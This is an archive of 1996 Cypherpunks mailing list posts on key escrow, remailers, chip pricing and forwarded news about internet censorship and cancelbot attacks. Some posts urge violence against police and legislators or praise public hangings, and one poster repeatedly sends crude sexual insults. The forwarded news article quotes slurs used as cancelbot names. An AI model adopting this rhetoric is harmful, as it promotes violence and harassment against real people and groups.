From: whallen at capitalnet.com (Wayne H. Allen)
Date: Mon, 30 Sep 1996 05:36:12 +0800
Subject: [AP] Afghanistan
Message-ID: <199609291924.PAA07683@ginger.capitalnet.com>

At 04:10 AM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote:
>Afghanis publicly hanged their former president, Najibullah [no last name].
>Other countries should follow their example.
>
>---
>
>Dr.Dimitri Vulis KOTM
>Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
>
>
And this would accomplish???? And this has what to do with cryptography??

Wayne H.Allen
whallen at capitalnet.com
Pgp key at www.capitalnet.com/~whallen

From tcmay at got.net Sun Sep 29 14:38:14 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 30 Sep 1996 05:38:14 +0800
Subject: The Petaflops Boondoggle Computer (was PET_ard)
In-Reply-To: <199609291850.LAA03605@mail.pacifier.com>
Message-ID:

At 11:50 AM -0800 9/29/96, jim bell wrote:
>At 10:00 AM 9/29/96 -0800, Timothy C. May wrote:
>>(Hoist by their own petards indeed! Don't tell our Russian what petard
>>means.)
>
>Uh, wasn't that the name of the bald captain on Star Trek Next Generation?
>You know, "Jean-Luc Petard"?

Picard.
To keep people out of suspense, "hoist by one's own petard" has one etymology involving a lift-off by gaseous action (though the more family-oriented dictionaries cite a petard as a French rocket of some sort, ignoring the point that the name comes from this same gaseous emission).

>Check out an article in about the September issue of Scientific American,
>1966, on the subject of the Illiac IV, which was one of the first attempts
>at a multiprocessor machine. Originally it was conceived as a 256-processor
>unit, at 4 million (floating point?) operations per second per processor
>which would have been 1 giga ops per second, but it was eventually built as
>a 64-processor unit and turned on in about 1972 or so. The succeeding
>factor-of-1000 improvement appears (if the item above is accurate) to have
>taken 24 years to accomplish, so it's hard to imagine that the next factor
>of 1000 will arrive appreciably sooner than year 2020.

I agree. By the way, I knew some of the folks who worked on parts of the Illiac-IV, which was still limping along as late as the late 70s (maybe later). It suffered, as expected, from lack of robust software. Not a huge incentive to write decent software when there's only a single machine!

(The Livermore S1 project was yet another such example. So was the CDC Star, of approximately the same vintage as the Illiac.)

>Oddly enough, however, we're getting somewhat of an echo of the "big single
>processor" phenomenon with the micros. We all know that in supercomputers,
>multiprocessors won out over single processors, and mainframes were just
>about defeated by microcomputers.
>
>Yet a look at Intel's pricing for Pentiums shows that they sell a 120-MHz
>chip for about $135, while they sell a 200-megahertz version for around $550
>or so. Arithmetic suggests that a person would be far better off with a
>4-120-MHz-processor Pentium (cumulative clock rate 480 MHz) than a single,
>200-megahertz version. (admittedly, peripheral logic costs will adjust this
>a little.) Of course, this would also leave Intel flat on its ass
>attempting to compete with AMD, Cyrix, etc, because a somewhat higher speed
>per cpu is just about the only advantage they have.

Intel is having no problem at all competing with AMD and Cyrix! Both of them are struggling---AMD just announced a layoff, and Cyrix is facing financial troubles. Neither are able to make competitive parts, for reasons I won't go into here, and neither are making the money they'll need to compete in the future with Intel. (Intel has half a dozen billion-dollar wafer fabs, running with extraordinarily high yields--so my sources tell me :-})--and the more money they make, the more factories they build, the more they learn about how to make 0.35 and 0.25 micron chips, etc.)

As to pricing, that's mostly a market issue. They charge what the market will bear. As to why a 200 MHz chip sells for 3-4x what a 120 MHz chip sells for, this is a matter of supply-and-demand and _system_ costs. When someone is already spending, say, $2000 on a system, they'll usually pay an extra $500 for a faster version. (Approximately. Again, the market is the ultimate arbiter.)

Symmetric multiprocessing is available, but it's often much less hassle to have a single CPU running at 200 MHz than to try games with multiple processors (which means more PCB real estate, more sockets, more of other things).

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From tcmay at got.net Sun Sep 29 14:54:39 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 30 Sep 1996 05:54:39 +0800
Subject: Key-Escrow
In-Reply-To: <960929141327_113858214@emout06.mail.aol.com>
Message-ID:

At 2:13 PM -0400 9/29/96, Scottauge at aol.com wrote:
>I have a question.
>
>There seems to be a lot of excitement over the key escrow stuff da gubermint
>is trying to install.
>
>Couldn't one burn off maybe 10 ** 200 keys and say, hey gubermint dude, these
>are like, gonna be my keys.

This has been discussed many times, even very recently.

You don't think key registration will be _free_, do you? Not many licenses are.

(Ignoring the issue of 10^200 being a lot more than there are particles in the Universe, now estimated to be 10^75 elementary particles.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From Ryan.Russell at sybase.com Sun Sep 29 15:02:49 1996
From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE)
Date: Mon, 30 Sep 1996 06:02:49 +0800
Subject: Utah as a Religious Police State
Message-ID: <9609291929.AA04064@notesgw2.sybase.com>

I guess that depends on your definition of liberty. The Mormons originally moved there to have a place to practice their religion, and have freedom from persecution. I suppose one could extend that to wanting a place to have the freedom to have a set of rules consistent with their beliefs. Should that include freedom from interference from folks such as yourself who want to change their rules, even though you're not presently affected?

Ryan

---------- Previous Message ----------
To: cypherpunks
cc:
From: tcmay @ got.net ("Timothy C. May") @ smtp
Date: 09/28/96 10:35:42 PM
Subject: Utah as a Religious Police State

Hey, Attila, let me know where you folks live...I may want to move there!

At 2:56 AM +0000 9/29/96, attila wrote:
> the population base is changing with an influx of non-Mormons
> in town, so R rated are showing up at the theatres and video
> rentals in town.

Just so long as my DSS dish still works in Utah--hey, I'll invite all the jack Mormons over for tomorrow night's showing of "Inside Janine," on the "Playboy Channel." (The "Playboy Channel" is kind of tame by video rental standards, but more crotch shots than we used to see a couple of years ago.)

> the police visible presence is effective --a force of 50+ for
> a population base < 25,000, plus the county sheriff cars and the
> state police. Curfew is 10pm weekdays for minors --and they
> enforce it, big time. midnight Fri/Sat.

They enforce the "curfew" big time? Looks like some Mormon pigs need to be zapped. (My kids don't cotton to no cop telling them when they can be out in public and when they can't. Any cop who tries to stop my kids from being out has earned severe retaliation. Any councilmember or state legislator who voted for such a curfew needs to be hog-tied, covered with tar, then torched.)

I guess this is why I wouldn't last very long in Mormon Country. A fascist encampment, it sounds like.

(I have no problem with Mormons, or Catholics, or Muslims, or Satanists keeping _their own_ children indoors after 7, or 5, or whatever their Holy Hour or Curfew Hour is, but no fucking religious nuts are going to tell _me_ when _my_ children must be indoors. I determine where my children may be, and I don't need the State's permission for them to be out. I would think anyone with an iota of libertarian sentiment would understand this.)

> ...idle hands are the devil's workshop. you want good solid
> kids, you start from the gate and keep 'em busy: home, neighbors,
> school, church, etc.

Do Utah's cops also enforce this law, too?

> they do not date until they are 16 --in groups. boys and
> girls --the same rules.

With the Utah State Police enforcing this "dating curfew"?

(I may sound harsh here, but "curfew" means one and only one thing to me: somebody restricting my freedom of those of my children to be a public place. Should one of my children be picked up by cops for doing nothing illegal, save for being "out past curfew," I'd consider violent response to be justified. It sounds to me--not that I ever thought otherwise--that Utah is not a land that favors liberty.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From bmcarpenter at trevecca.edu Sun Sep 29 15:27:12 1996
From: bmcarpenter at trevecca.edu (Myers W. Carpenter)
Date: Mon, 30 Sep 1996 06:27:12 +0800
Subject: Making Remailers Widespread
In-Reply-To: <199609290623.XAA25627@dfw-ix3.ix.netcom.com>
Message-ID:

At 12:23 AM -0600 on 9/29/96, Bill Stewart wrote:
> One way to do that is to parse Raph's list appropriately (and check
> signatures on that); another is to have some centralized (sigh) DNS server
> do a round-robin distribution so that random.remailer.net picks a
> random known-good remailer to deliver through, perhaps also delivering a PGP
> key.

Add another level: have a Random1.remailer.net thru random800.remailer.net. You just then have premail or something pick one at random. Hey, why not? anyway...
myers

From dustman at athensnet.com Sun Sep 29 15:30:14 1996
From: dustman at athensnet.com (Dustbin Freedom Remailer)
Date: Mon, 30 Sep 1996 06:30:14 +0800
Subject: Transforming variable-length to fixed keys
In-Reply-To: <84399947820692@cs26.cs.auckland.ac.nz>
Message-ID: <199609291955.PAA06871@godzilla.athensnet.com>

> [1] There's a story from IBM when they were testing a new IBM-internal
> encryption system for long-haul telecoms applications. They were
> playing around with bouncing encrypted transmissions off an IBM-owned
> satellite when they were contacted by the NSA who said "You're not using
> DES. Stop it".

This story has already been debunked on this mailing list, I believe.

From dweightman at radix.net Sun Sep 29 15:33:04 1996
From: dweightman at radix.net (Donald Weightman)
Date: Mon, 30 Sep 1996 06:33:04 +0800
Subject: Internet 'terrorism' newsclips [CYPHER, but news]
Message-ID: <199609292003.QAA08843@news1.radix.net>

From today's PARADE magazine, that valuable source for insight into the popular heart and mind, "explaining" why "we" haven't been able to catch Iranian terrorists:

>Thanks to the highly sophisticated surveillance capabilities, American
>intelligence agencies have intercepted enough telephone messages from Iran,
>ordering acts of terrorism, that Iran's terrorist network stopped using the
>phone. Reportedly this has caused them to start using codes on the Internet
>that are "practically" impossible to track and isolate.
>"Just when we thought we had outsmarted them, they caught on and started
>using codes on the Internet", an expert in international terrorism tells
>us. "There's so much crazy screwball stuff on the Internet that it's
>practically impossible to track down and isolate the terrorists. No
>government can analyze those millions and millions of messages."

And from another piece of hard-hitting quote-the-official-source journalism in PARADE, "A New Worry: Terrorism in Cyberspace"

>The danger of computer-based "cyper" attacks is second only to that posed by
>nuclear arms and other weapons of mass destruction, says CIA's Director, John
>Deutch. He expects the threat to grow as we rush to connect the world on the
>Internet.
>There were more than 250,000 attacks on Department of Defense computers last
>year, and 65% were successful. Little is known about who launched them, why, or
>what they found. In a recent test, Defense Department "red teams" admit to
>intentionally hacking into 18,200 systems, with only 5% of the attacks
>detected; only 27% of those attacks were reported.

Wonder if the timing of these stories has anything to do with the end of term legislative push on wiretapping.

Don Weightman
dweightman at radix.net

From tcmay at got.net Sun Sep 29 15:48:54 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 30 Sep 1996 06:48:54 +0800
Subject: Utah as a Religious Police State
In-Reply-To: <9609291929.AA04060@notesgw2.sybase.com>
Message-ID:

(I received this message, with "cypherpunks at sybase.com" as well as "tcmay at sybase.com" (???) cc:ed, so I assume this message was intended for the Cypherpunks list, with some sybase domain name weirdness, or reflector, going on.)

At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote:
>I guess that depends on your definition of liberty. The Mormons
>originally moved there to have a place to practice their religion,
>and have freedom from persecution. I suppose one could extend that
>to wanting a place to have the freedom to have a set of rules consistent
>with their beliefs. Should that include freedom from interference from
>folks such as yourself who want to change their rules, even though
>you're not presently affected?

Well, if Utah can rig a way to _secede_ from the Union, your arguments would make more sense.
But so long as they are part of these United States, their religious beliefs about when children should be at home cannot supersede basic liberties.

(There are some thorny issues about whether _minors_ have full civil rights. But I certainly know that _my_ civil rights are being affected when my children are not allowed on the streets after some hour. If my child is out, this is my problem. I neither want cops to stop-and-detain my children, nor do I want my tax monies to be used to control the behavior of other people's children. Providing no crimes are being committed, curfews for the sake of controlling the behavior of children are no more just than would be a bunch of related behavior control laws, e.g., a ban on comic books, a mandate that all children join after-school youth leagues, etc.)

As for "changing their rules," you're missing the point. There are presumably many in Utah who believe as I do (maybe even some Mormons). Those who are living in Utah, as renters, owners, whatever, should not be bound by unconstitutional rules, no matter how many Mormon Elders favor them. Unless the Mormons own _all_ of the property (and maybe not even then, as renters have civil rights), they cannot impose their own notions of morality on the rest of the population, except in compelling cases (e.g., involving the well-known actual _crimes_).

I don't mean to pick on Mormons, as other communities have also attempted to impose curfews and other restrictions on the children of others. My ire was raised by Attila's enthusiastic support for laws which no freedom-loving person should be enthusiastic about.

Again, I have no problem with Attila restricting his own children's movements, or joining with other parents to control the behavior of their _own_ children, via religious camps, religious schools, youth leagues, etc. He can even make his own kids wear funny uniforms, funny religious hats, whatever.
But, for example, telling _me_ when _my_ children may be out on public streets (doing nothing illegal, neither robbing nor spray-painting nor committing any other real crimes) is unacceptable.

I urge Attila (and others) to rethink enthusiastic support for curfews.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From azur at netcom.com Sun Sep 29 16:54:43 1996
From: azur at netcom.com (Steve Schear)
Date: Mon, 30 Sep 1996 07:54:43 +0800
Subject: Internet 'terrorism' newsclips [CYPHER, but news]
Message-ID:

>>There were more than 250,000 attacks on Department of Defense computers last
>>year, and 65% were successful. Little is known about who launched them,
>why, or
>>what they found. In a recent test, Defense Department "red teams" admit to
>>intentionally hacking into 18,200 systems, with only 5% of the attacks
>>detected; only 27% of those attacks were reported.
>
>Wonder if the timing of these stories has anything to do with the end of
>term legislative push on wiretapping.

Quite possibly. The message from this article is clear. Step up investigation and prosecution of illegal government Net activities :-)

-- Steve

From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 29 17:07:19 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Mon, 30 Sep 1996 08:07:19 +0800
Subject: Chinese Censorship
Message-ID: <01IA25JKUW7C8WWVXE@mbcl.rutgers.edu>

> _________________________________________________________________
> Cisco-Job Fair
> _________________________________________________________________
> CHINA RELAXES CONTROLS ON INTERNET ACCOUNTS
> __________________________________________________________________________
> Copyright © 1996 Nando.net
> Copyright © 1996 Reuter Information Service
> SHANGHAI (Sep 25, 1996 08:48 a.m. EDT) - China has removed limits on
> the country's number of Internet accounts following the recent
> installation of safety controls on the computer network, a senior
> Shanghai telecommunications official said on Wednesday.

Safety controls... nice euphemism, similar to "key recovery".

> "Some time ago, our security arrangements were incomplete and there
> was a problem with pornographic and politically unacceptable
> material," said Zhang Weihua, vice-president of the Shanghai Post and
> Telecommunications Administration.

[...]

> Zhang said access to sites on the Internet containing pornographic or
> politically unacceptable material had been restricted, adding, "This
> material is restricted all over the world."
> He declined to give details of the security controls placed on the
> servers, saying he was only responsible for the technical side of the
> service.
> But Zhang did say he was unaware of any restrictions on access to
> major international news sites through China's Internet servers.
> Foreign reports have suggested that China has cut off access to such
> news sites. Analysts say that China is concerned over development of
> public computer networks and their use by people opposed to communist
> rule or communist policies.

[...]

> Zhang said for "security" reasons there was a need to control
> information and discussion on the Internet and related bulletin board
> services.
> "But surveys done on the usage and interests of people in China with
> Internet access indicate that virtually all the material they wanted
> to look at is domestic," he said.

Due to language differences, I would guess.

> China's key Internet Service Provider (ISP) selling access accounts is
> Chinanet, controlled by the Post and Telecommunications Bureau.
> Zhang said the bureau took measures earlier this year to control
> unauthorised activities of other access providers, including
> Shanghai's Fudan University, in order to handle the security issue.
> China currently has access points to the Internet in Beijing and
> Shanghai. It has no plans to add more, Zhang said.
> He said his department was being assisted in building its computer
> network by several American-Chinese originally from mainland China who
> spent time working with the U.S. space agency NASA.

I see.... (grimace)

> Copyright © 1996 Nando.net

From nobody at cypherpunks.ca Sun Sep 29 17:23:33 1996
From: nobody at cypherpunks.ca (John Anonymous MacDonald)
Date: Mon, 30 Sep 1996 08:23:33 +0800
Subject: Does any body know anything about this?
Message-ID: <199609292138.OAA27616@abraham.cs.berkeley.edu>

Is this just more snakeoil or is this real?

<<<<<<<< FORWARDED MESSAGE >>>>>>>>
From: Ross Anderson
Date: Fri, 20 Sep 1996 09:05:28 +0100
Subject: Seminar in Cryptology and Computer Security

*** *** *** *** ***

University of Cambridge Computer Laboratory

EXTRA SEMINAR

SPEAKER: Matt Blaze AT&T Research
DATE: Monday 23rd September 1996 at 11.30 am
PLACE: Room TP4, Computer Laboratory
TITLE: SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS

A useful principle in cipher design is to reduce or at least relate closely the cryptanalysis of the cipher to some long-studied problem that is believed to be difficult. Most public-key ciphers follow this principle fairly closely (e.g., RSA is at least similar to factoring).
Modern symmetric-key ciphers, on the other hand, can rarely be reduced in this way and so are frequently designed specifically to resist the various known cryptanalytic attacks.

In this informal talk, we examine a simple cipher primitive, based on Feistel networks, for which recovery of its internal state given its inputs and outputs is NP-complete. We outline simple and efficient block- and stream- cipher constructions based on this primitive.

* * *

The regular Michaelmas term seminar series will resume on the 8th October with a series of talks on Tuesday afternoons at 4.15 PM in room TP4, Computer Laboratory, Pembroke Street, Cambridge. A list of speakers will be circulated shortly.

* * *

From dlv at bwalk.dm.com Sun Sep 29 17:25:25 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 08:25:25 +0800
Subject: Utah as a Religious Police State
In-Reply-To: <9609291929.AA04064@notesgw2.sybase.com>
Message-ID:

Ryan Russell/SYBASE writes:
> I guess that depends on your definition of liberty. The Mormons
> originally moved there to have a place to practice their religion,
> and have freedom from persecution. I suppose one could extend that
> to wanting a place to have the freedom to have a set of rules consistent
> with their beliefs. Should that include freedom from interference from
> folks such as yourself who want to change their rules, even though
> you're not presently affected?

It's worth noting that one of Utah mormons favorite pastimes was to ambush the settlers heading for California, kill them all, and take their property. However the mormons were dealt with much less severely than the local Indians who tried the same tricks. Pity.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From dlv at bwalk.dm.com Sun Sep 29 17:27:04 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 08:27:04 +0800
Subject: [AP] Afghanistan
In-Reply-To: <199609291924.PAA07683@ginger.capitalnet.com>
Message-ID:

"Wayne H. Allen" writes:
> At 04:10 AM 9/29/96 EDT, Dr.Dimitri Vulis KOTM wrote:
> >Afghanis publicly hanged their former president, Najibullah [no last name].
> >Other countries should follow their example.
> >
>
> And this would accomplish???? And this has what to do with cryptography??

Nothing, of course - neither do Timmy May's stupid rants, lies, and personal attacks.

By the way, your abuse of your native language suggests that you're probably a product of U.S. public education.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From sebago at earthlink.net Sun Sep 29 17:30:22 1996
From: sebago at earthlink.net (Allen Robinson)
Date: Mon, 30 Sep 1996 08:30:22 +0800
Subject: earthlink's image
Message-ID: <199609292210.PAA14662@andorra.it.earthlink.net>

On 28 Sep 96 at 16:09, Back Draft wrote:
> Date: Sat, 28 Sep 1996 16:09:20 -0800
> To: cypherpunks at toad.com
> From: backdraft at earthlink.net (Back Draft)
> desubscribe
>

Please do not assume that all earthlink users are alike. I've just mailed instructions on how to unsubscribe to "Back Draft."

AR

#%#%#%#%#%#%#%#%#%#%#%#%#%#%#%
"In the end, more than they wanted freedom, they wanted security. When the Athenians finally wanted not to give to society but for society to give to them, when the freedom they wished for was freedom from responsibility, then Athens ceased to be free."
- Edward Gibbon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Allen Robinson.........................sebago at earthlink.net
PGP public key FE4A0A75
fingerprint 170FBC1F7609B76F 967F1CC8FCA7A41F

From lurker at mail.tcbi.com Sun Sep 29 17:38:02 1996
From: lurker at mail.tcbi.com (Lurker)
Date: Mon, 30 Sep 1996 08:38:02 +0800
Subject: newsgoup gateways
Message-ID: <2.2.32.19960929223835.006dcfd8@mail.tcbi.com>

I was wondering if anyone could point me to some servers that will allow me to post to newsgroups. I have seen some around that use the format: newsgroup at domain and forward the mail to the chosen newsgroup.

Thanks

From dlv at bwalk.dm.com Sun Sep 29 17:53:34 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 08:53:34 +0800
Subject: The Petaflops Boondoggle Computer (was PET_ard)
In-Reply-To:
Message-ID:

The pathological liar "Timothy C. May" writes:
> At 11:50 AM -0800 9/29/96, jim bell wrote:
> >At 10:00 AM 9/29/96 -0800, Timothy C. May wrote:
> >>(Hoist by their own petards indeed! Don't tell our Russian what petard
> >>means.)
> >
> >Uh, wasn't that the name of the bald captain on Star Trek Next Generation?
> >You know, "Jean-Luc Petard"?
>
> Picard. To keep people out of suspense, "hoist by one's own petard" has one
> etymology involving a lift-off by gaseous action (though the more
> family-oriented dictionaries cite a petard as a French rocket of some sort,
> ignoring the point that the name comes from this same gaseous emission).

OK. Igor, petard is the explosive device that Timmy May likes to stick up his rectum in order to derive sexual pleasure. He should discuss it on his favorite Usenet newsgroup, alt.sex.masturbation, and not on a crypto-related mailing list.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 29 18:27:03 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Mon, 30 Sep 1996 09:27:03 +0800
Subject: British Censorship
Message-ID: <01IA2577Q5RK8WWVXE@mbcl.rutgers.edu>

The actions they claim they will do will, of course, lead to no results whatsoever in many cases... as it should be. The hotline in question sounds like a number as opposed to an email address... pity, we could just bounce all spam to it and ask them to deal with it.

> _________________________________________________________________
> Cisco-Job Fair
> _________________________________________________________________
> BRITISH GOVERNMENT SETS UP NET PORN FILTER
> __________________________________________________________________________
> Copyright © 1996 Nando.net
> Copyright © 1996 Reuter Information Service
> LONDON (Sep 23, 1996 3:48 p.m. EDT) - The British government Monday
> set up a watchdog to try to get pornography off the Internet.
> Safety-Net, which is being financed by the industry, will have a
> hotline to which callers can report suspected illegal material and
> will contact police if necessary.

Being financed by the industry = if you're going through a British ISP, you're paying for it whether you like it or not.

> It will publish a "legality indicator" or rating for each public
> access area on the Internet known as a Usenet news group. The rating
> will indicate whether the group normally contains illegal or
> pornographic material and what kind.
> Internet users can contact the hotline to complain about material
> received from anyone via an automatic telephone, mail, e-mail or
> facsimile.
> Safety-Net operators will try to see where the material came from,
> contact the authors and ask them to remove it. They can ask the
> relevant service provider to take action and pass details to the
> British Police National Criminal Intelligence Service (NCIS).
> "We at the Home Office (interior ministry) made it clear to the > Internet providers some time ago that action was needed to deal with > obscene material on the Internet," Home Office Minister Tom Sackville > said. [...] > Science and technology minister Ian Taylor said Safety-Net would act > as a warning system to alert the public. > "As this is an international network, we have to do something to try > to eliminate illegal use of it -- the abuse of the Internet by a few > perverts," he told BBC radio. As this is an international network, this is completely impossible. > "Government and the Internet industry have been working hard to come > up with proposals that can offer real protection to net users while > preserving free speech and recgonizing the value of the net for work, > education and leisure," Taylor added in a statement. Usual government doubletalk.... preserving free speech means no such actions. [...] > Copyright © 1996 Nando.net From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 29 18:42:14 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Mon, 30 Sep 1996 09:42:14 +0800 Subject: Cancelbots in the news Message-ID: <01IA25EOA9H08WWVXE@mbcl.rutgers.edu> > _________________________________________________________________ > Centura > _________________________________________________________________ > HATE HACKERS: KILLING DIALOGUE ON THE INTERNET > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 San Francisco Examiner Note the usual misuse of the term "hacker." > (Sep 28, 1996 02:18 a.m. EDT) -- One or more hackers using racist and > other hate terms have erased tens of thousands of messages used by a > wide variety of political discussion groups on the Internet, exposing > new concerns about the security of the worldwide computer system. 
> At least one Internet customer -- in Oklahoma -- has been blamed for > some of the more than 30,000 killed messages and has been cut off by > his service provider. > "Obviously, the individual responsible is no longer around here," said > William Brunton, president of Internet Connection of Tulsa, one of > several service providers of Usenet news groups that were victimized > during the weekend. "You can be assured it's not going to happen again > from here." The author really doesn't understand USENET, does he (or she)? Evidently, one of the persons posting the cancels was doing so out of this company. > He said he had turned information over to federal authorities and > could not comment further. > In Washington, D.C., an FBI spokesman declined to confirm whether the > matter was being investigated although it was unclear what, if any, > laws may have been violated. > The messages were deleted from system discussion sites used by gays, > Jewish groups, Muslims, feminists and other politically oriented > groups. > The perpetrator or perpetrators used so-called "cancelbot" software > programs labeled with such phrases as "fagcancel" and "kikecancel." > Besides Brunton's small Oklahoma firm, Internet service providers > whose discussion groups were victimized included industry giants > Netcom Inc. of San Jose, and UU Net Technologies of Falls Church, Va. > Officials of those firms were not available for comment. And operating out of these? Or is it simply that the groups in question are carried by these firms? > While some believed such attacks pose a serious threat to the sanctity > of the Internet -- which is virtually unregulated save for a generally > adhered-to protocol known as "netiquette" -- others were less alarmed. Usual mixup between USENET and the Internet, of course. > "There actually are no laws against that sort of thing," said Jonah > Seiger, policy analyst for the Center for Democracy and Technology in > Washington, D.C. 
"Obviously, it's sort of annoying." > He said a cancelbot, or a forged cancel message, is "a malicious > vehicle and not good netiquette." [...] > Two years ago, when some immigration lawyers "spammed the net" -- > electronically plastering news groups throughout the Internet with a > single message, an advertisement telling how to get a green card -- > "it was the first time someone figured out you could cancel those > messages," Seiger said. > Since then, phony cancelbots have appeared with some frequency. In one > of the better-known cases, the Church of Scientology used cancelbots > to erase messages from news groups used by some of its members with > whom the church was engaged in a legal battle. > The security of the Internet has also been brought into question > recently after hackers altered home pages operated by the CIA and the > Justice Department. [...] > Copyright © 1996 Nando.net From dlv at bwalk.dm.com Sun Sep 29 18:59:21 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 30 Sep 1996 09:59:21 +0800 Subject: [SPAM] More fan mail from Timmy "peteur" May In-Reply-To: <844008901.9441.0@fatmans.demon.co.uk> Message-ID: What has Timmy been smoking? 
]From paul at fatmans.demon.co.uk Sun Sep 29 19:03:40 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 29 Sep 96 19:14:06 EDT ] for dlv ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA25790 for dlv at bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400 ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac16129; ] 29 Sep 96 15:59 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa09441; 29 Sep 96 15:54 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000 ]Comments: Authenticated sender is ]From: paul at fatmans.demon.co.uk ]To: "Dr.Dimitri Vulis KOTM" ]Date: Sat, 28 Sep 1996 09:21:37 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: Possible subs attack???? ]Priority: normal ]X-Pm-Encryptor: JN-PGP-P, 4 ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <844008901.9441.0 at fatmans.demon.co.uk> ] ]-----BEGIN PGP SIGNED MESSAGE----- ] ] ]> The lying sack of shit Timmy May writes: ] ]> The lying sack of shit Timmy May lies again, as usual. ] ]Fuck you, ] ]I am not Tim May, Check out the return path if you don`t believe me, ]if you still don`t here`s my PGP public key signed by the EFF, they ]don`t sign keys here and there without checking ID`s... 
] ]Type Bits/KeyID Date User ID ]pub 1024/5BBFAEB1 1996/07/30 Paul Bradley ] ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org ] Http://www.cryptography.home.ml.org/ ] Email for PGP public key, ID: 5BBFAEB1 ] "Don`t forget to mount a scratch monkey" From EALLENSMITH at ocelot.Rutgers.EDU Sun Sep 29 19:35:30 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. 
Allen Smith) Date: Mon, 30 Sep 1996 10:35:30 +0800 Subject: European Censorship Proposals Message-ID: <01IA2ANWJV3K8Y56RA@mbcl.rutgers.edu> > _________________________________________________________________ > Centura > _________________________________________________________________ > EURO-COMMISSION TO TACKLE PORN ON INTERNET > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > BRUSSELS (Sep 24, 1996 08:06 a.m. EDT) - The European Commission, > faced with calls to clamp down on use of the Internet to transmit > pornography following a Belgian paedophilia scandal, will take a first > step in October towards seeing how it can be done. > But Culture Commissioner Marcelino Oreja, who intends to unveil a > discussion paper on new media services on October 9, says that the > process will be a lengthy one in consultation with all concerned and > that at the end of the day a world solution could be needed. [...] > "We have to find mechanisms to see first how we can find the author > who includes this pornography in the Internet and second how we can > encrypt the content of these messages," he said. > The call for a European-wide solution to pornography and paedophilia > on the Internet is expected to be a central theme for EU justice > ministers in Dublin on Thursday and Friday when they discuss ways of > fighting the child sex trade. > EU culture ministers could also discuss it at their own meeting in the > Irish town of Galway on Wednesday. > The discovery of four murdered girls in Belgium and a child murder, > prostitution and pornography ring has focused the world's attention on > the child sex trade and fuelled calls for a clamp down on the > Internet, which at the moment is little policed and where anonymity is > assured. 
